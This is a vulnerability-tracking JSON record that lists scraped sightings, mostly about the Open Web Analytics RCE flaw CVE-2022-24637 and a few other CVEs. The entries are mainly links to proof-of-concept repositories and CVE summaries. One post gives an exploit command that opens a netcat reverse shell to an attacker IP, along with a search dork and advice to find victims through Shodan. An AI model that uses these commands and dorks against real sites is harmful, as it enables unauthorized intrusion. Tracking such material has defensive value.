{"vulnerability": "CVE-2022-2463", "sightings": [{"uuid": "f4d2bc50-5717-427b-8022-20a8c6ac66e9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-24637", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-06T03:13:45.000000Z"}, {"uuid": "20ee434a-afd9-4f72-a1af-f5c40377e4c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-24637", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-23T04:10:44.000000Z"}, {"uuid": "fb4a5558-1429-4196-a42d-d43aa118dec0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-24637", "type": "seen", "source": "MISP/a9d21043-f825-4bac-8d2b-56fb9e8343e7", "content": "", "creation_timestamp": "2025-10-23T21:13:00.000000Z"}, {"uuid": "5b71f7de-05c8-43f7-af92-0b3866ca7186", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-24637", "type": "published-proof-of-concept", "source": "https://t.me/MrVGunz/448", "content": "CVE-2022-24637 : Open web analytics info disclosure to RCE\nhttps://github.com/watchdog2000/cve-2022-24637_open-web-analytics-info-disclosure-to-rce", "creation_timestamp": "2022-08-31T14:31:06.000000Z"}, {"uuid": "dcb07767-c146-4618-8eda-2c120b4d1379", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-24637", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/182", "content": "Drone Hacking Tool\n\nA GUI tool that works with a USB Wifi adapter and HackRF One for hacking drones.\n\nDrones, as a high mobility item that can be carried around easily and launched, are becoming cheaper and more popular among the public, they can be seen almost anywhere nowadays.\n\nHowever, the drone built-in flying cameras could use for illegal usage like candid photos on private property. This shows drones clearly present risks to public safety and personal privacy.\n\nTherefore, we are working on using wireless connection methods (Wi-Fi, GPS) to hack it and take over. In this project, our goal is to capture drones to stop users with malicious intent for proof of concept and a sense of accomplishment.\n\nhttps://github.com/HKSSY/Drone-Hacking-Tool\n\nzyxel ipc camera pwn\n\nThis is a minimal proof of concept to remotely open a root shell on a Zyxel IP enabled camera. Known vulnerable models are:\n\n\u25ab\ufe0f Zyxel IPC-3605N\n\u25ab\ufe0f Zyxel IPC-4605N\n\nhttps://github.com/hydrogen18/zyxel_ipc_camera_pwn\n\nRFID Gooseneck\n\nTraditional RFID badge cloning methods require you to be within 3 feet of your target, so how can you conduct a socially distanced physical penetration test and clone a badge if you must stay at least 6 feet from a person? Since 2020, companies have increasingly adopted a hybrid work environment, allowing employees to partially work remotely which has decreased the amount of foot traffic in and out of a building at any given time. \n\nSo after throwing around some ideas I thought, why not create a mobile long-range reader device that we could deploy early in the morning at a client site and let it do all the work for us. This project guide contains an entry-level hardware design that you can build in a day and deploy in the field in order to increase your chances of remotely cloning an RFID badge.\n\nHere's the full build guide for making your own RFID Goosneck Long Range Reader!\n\nhttps://github.com/sh0ckSec/RFID-Gooseneck\n\nExchangeFinder\n\nA simple and open-source tool that tries to find Micrsoft Exchange instance for a given domain based on the top common DNS names for Microsoft Exchange.\n\nhttps://github.com/mhaskar/ExchangeFinder\n\nCVE-2022-24637\n\nOpen Web Analytics (OWA) before 1.7.4 allows an UNAUTHENTICATED remote attacker to obtain sensitive user information, which can be used to gain admin privileges by leveraging cache hashes. This occurs because files generated with '", "creation_timestamp": "2022-12-19T00:22:37.000000Z"}, {"uuid": "108053c5-3ace-4f6f-a36e-94247c79c150", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-24637", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/open_web_analytics_rce.rb", "content": "", "creation_timestamp": "2023-03-17T10:03:20.000000Z"}, {"uuid": "52da06fa-80e4-4770-a181-07a3df646165", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-24637", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/2152", "content": "Drone Hacking Tool\n\nA GUI tool that works with a USB Wifi adapter and HackRF One for hacking drones.\n\nDrones, as a high mobility item that can be carried around easily and launched, are becoming cheaper and more popular among the public, they can be seen almost anywhere nowadays.\n\nHowever, the drone built-in flying cameras could use for illegal usage like candid photos on private property. This shows drones clearly present risks to public safety and personal privacy.\n\nTherefore, we are working on using wireless connection methods (Wi-Fi, GPS) to hack it and take over. In this project, our goal is to capture drones to stop users with malicious intent for proof of concept and a sense of accomplishment.\n\nhttps://github.com/HKSSY/Drone-Hacking-Tool\n\nzyxel ipc camera pwn\n\nThis is a minimal proof of concept to remotely open a root shell on a Zyxel IP enabled camera. Known vulnerable models are:\n\n\u25ab\ufe0f Zyxel IPC-3605N\n\u25ab\ufe0f Zyxel IPC-4605N\n\nhttps://github.com/hydrogen18/zyxel_ipc_camera_pwn\n\nRFID Gooseneck\n\nTraditional RFID badge cloning methods require you to be within 3 feet of your target, so how can you conduct a socially distanced physical penetration test and clone a badge if you must stay at least 6 feet from a person? Since 2020, companies have increasingly adopted a hybrid work environment, allowing employees to partially work remotely which has decreased the amount of foot traffic in and out of a building at any given time. \n\nSo after throwing around some ideas I thought, why not create a mobile long-range reader device that we could deploy early in the morning at a client site and let it do all the work for us. This project guide contains an entry-level hardware design that you can build in a day and deploy in the field in order to increase your chances of remotely cloning an RFID badge.\n\nHere's the full build guide for making your own RFID Goosneck Long Range Reader!\n\nhttps://github.com/sh0ckSec/RFID-Gooseneck\n\nExchangeFinder\n\nA simple and open-source tool that tries to find Micrsoft Exchange instance for a given domain based on the top common DNS names for Microsoft Exchange.\n\nhttps://github.com/mhaskar/ExchangeFinder\n\nCVE-2022-24637\n\nOpen Web Analytics (OWA) before 1.7.4 allows an UNAUTHENTICATED remote attacker to obtain sensitive user information, which can be used to gain admin privileges by leveraging cache hashes. This occurs because files generated with '", "creation_timestamp": "2022-12-19T00:22:37.000000Z"}, {"uuid": "7f0d5b65-2316-4e7a-aa01-ccf5f8a6e978", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-24637", "type": "published-proof-of-concept", "source": "Telegram/EMOPfN3gSH7UAdWsP9EVBdFls_2Mn9j37JuUwZW1JfpnJRI", "content": "", "creation_timestamp": "2022-12-19T08:14:23.000000Z"}, {"uuid": "e8bdbd7d-db7b-4a9d-842b-55bb7c2126f5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-24637", "type": "published-proof-of-concept", "source": "https://t.me/intelexch/19184", "content": "https://github.com/JacobEbben/CVE-2022-24637", "creation_timestamp": "2022-09-01T15:39:43.000000Z"}, {"uuid": "f1a945e2-107a-41ae-9054-a87869aaecd7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-24637", "type": "published-proof-of-concept", "source": "https://t.me/intelexch/26562", "content": "https://github.com/hupe1980/CVE-2022-24637", "creation_timestamp": "2022-10-12T20:55:43.000000Z"}, {"uuid": "114f36f1-5c70-4df0-b727-b9d061a5afd5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-2463", "type": "seen", "source": "https://t.me/cibsecurity/48806", "content": "\u203c CVE-2022-2463 \u203c\n\nRockwell Automation ISaGRAF Workbench software versions 6.0 through 6.6.9 are affected by a Path Traversal vulnerability. A crafted malicious .7z exchange file may allow an attacker to gain the privileges of the ISaGRAF Workbench software when opened. If the software is running at the SYSTEM level, then the attacker will gain admin level privileges. User interaction is required for this exploit to be successful.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-08-25T22:24:29.000000Z"}, {"uuid": "129d1e02-b34f-4a28-bac5-0c648a1c1488", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-24637", "type": "published-proof-of-concept", "source": "https://t.me/DailyToolz/560", "content": "OWA RCE  ( THIS REAL RCE NOT SHELL FINDER )\nDownload : in comment :)\nCommand : python rce-2022-24637.py \u2014help\n\ncve : CVE-2022-24637 \nExploit title : Open Web Analytics 1.7.3 - Remote Code Execution (RCE)\n\ncommand : \npython rce.py -p mypass https://site.com 192.168.0.103 4444\n\n( the ip and the 4444 u can change to ur netcat ) \nRequire : \n- Netcat ( for reverse shell ) \n- Python 3\n\nDork?title: Open-Web-Analytics\nUse shodan/censys/zoomeye/criminalip\n\nMore tools & method join > @DailyToolz", "creation_timestamp": "2022-12-19T12:07:27.000000Z"}, {"uuid": "df4138a4-81c6-4aa8-bffe-4dae1ad84439", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-24631", "type": "seen", "source": "https://t.me/cibsecurity/64770", "content": "\u203c CVE-2022-24631 \u203c\n\nAn issue was discovered in AudioCodes Device Manager Express through 7.8.20002.47752. It is stored XSS via the ajaxTenants.php desc parameter.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-05-30T00:36:22.000000Z"}, {"uuid": "a6d8e552-77bd-453b-8377-b501701e0b44", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-24637", "type": "seen", "source": "https://t.me/cibsecurity/39208", "content": "\u203c CVE-2022-24637 \u203c\n\nOpen Web Analytics (OWA) before 1.7.4 allows an unauthenticated remote attacker to obtain sensitive user information, which can be used to gain admin privileges by leveraging cache hashes. This occurs because files generated with '", "creation_timestamp": "2022-10-12T01:06:27.000000Z"}, {"uuid": "162af19c-2a89-4662-92c2-2c3b67d9037f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-24637", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/6693", "content": "#exploit\n1. CVE-2022-24637:\nOpen web analytics info disclosure to RCE\nhttps://github.com/watchdog2000/cve-2022-24637_open-web-analytics-info-disclosure-to-rce\n\n2. CVE-2022-38766:\nPoC for vulnerability in Renault ZOE Keyless System\nhttps://github.com/AUTOCRYPT-IVS-VnV/CVE-2022-38766", "creation_timestamp": "2022-08-29T11:37:02.000000Z"}, {"uuid": "4eebeda7-6ca7-434e-b968-47adde72433c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-24633", "type": "seen", "source": "https://t.me/cibsecurity/37989", "content": "\u203c CVE-2022-24633 \u203c\n\nAll versions of FileCloud prior to 21.3 are vulnerable to user enumeration. The vulnerability exists in the parameter \"path\" passing \"/SHARED/\". A malicious actor could identify the existence of users by requesting share information on specified share paths.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-02-24T18:14:38.000000Z"}]}